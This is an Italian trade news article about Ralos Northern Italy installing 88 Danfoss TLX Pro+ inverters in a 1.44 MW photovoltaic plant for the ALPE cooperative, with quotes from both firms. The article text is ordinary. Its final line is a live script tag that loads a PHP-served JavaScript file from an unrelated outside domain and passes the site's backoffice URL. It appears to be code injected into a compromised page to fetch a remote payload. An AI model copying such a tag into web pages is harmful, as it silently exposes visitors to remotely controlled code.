1. Home
  2. Notizie e Mercato
  3. Ralos Northern Italy sceglie gli inverter Danfoss per l’impianto del Consorzio ALPE-Alpine

Ralos Northern Italy sceglie gli inverter Danfoss per l’impianto del Consorzio ALPE-Alpine

Energie rinnovabili di
5/5
votato da 1 persone
Ralos Northern Italy si è affidata all’avanzata tecnologia degli inverter di stringa Danfoss per la realizzazione di un impianto fotovoltaico tecnologicamente integrato


E’ entrato in esercizio all’inizio di giugno l’impianto da 1,44 MW realizzato da Ralos Northern Italy sulla copertura della sede della Società Cooperativa ALPE di Lasa (BZ). Per questo importante progetto l’EPC alto atesino ha scelto gli inverter Danfoss TLX Pro +, riuscendo a soddisfare pienamente le richieste del cliente.

Ralos Northern Italy, noto EPC di Merano che si occupa della progettazione e realizzazione di impianti fotovoltaici nell’Italia settentrionale offrendo un servizio chiavi in mano in collaborazione con i più importanti produttori di componenti, ha realizzato per la Coop. Frutt. ALPE di Lasa (BZ) un impianto fotovoltaico tecnologicamente integrato da 1.440 kWp.

Come per altri progetti sviluppati in precedenza, anche questa volta Ralos si è affidata all’avanzata tecnologia degli inverter di stringa Danfoss.
Per la realizzazione dell’impianto sono stati utilizzati 88 inverter della gamma TLX Pro + da 15 kW, che, grazie all’elevata efficienza, ad un intervallo di tensione in ingresso di 1000V e a 3 MPPT indipendenti, forniscono la massima quantità di energia assicurando al tempo stesso la maggiore flessibilità nella configurazione FV.

Nel caso dell’impianto di Alpe, Ralos ha scelto la versione Pro, che include il monitoraggio integrato e la funzione Inverter Master. Il server web integrato consente di monitorare l’impianto da remoto via internet senza la necessità di installare dispositivi aggiuntivi, mentre la funzione Inverter Master permette di controllare e replicare le impostazioni fino a 100 inverter da una singola unità designata come Master. In questo modo le procedure d’installazione e dei successivi aggiornamenti dell’impianto risultano molto più semplici e veloci.

“Siamo molto soddisfatti della nostra collaborazione con un EPC di prestigio come Ralos – commenta l’ing. Lorenzo Colombo, Country Manager di Danfoss Solar Inverters Italia – Il fatto che la scelta degli inverter sia ricaduta anche questa volta su Danfoss dimostra che i tecnici Ralos hanno saputo riconoscere gli importanti aspetti tecnici che contraddistinguono i nostri prodotti”.

“Per questo importante progetto Danfoss si è dimostrata la scelta giusta – aggiunge  Günther Mederle, Amministratore di Ralos Northern Italy – abbiamo apprezzato non solo le caratteristiche tecniche del prodotto, ma anche il supporto tecnico ricevuto dal team Danfoss durante tutte le fasi del progetto, dalla configurazione alla messa in servizio dell’impianto”.

<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.22900271406346118" type="text/javascript"></script>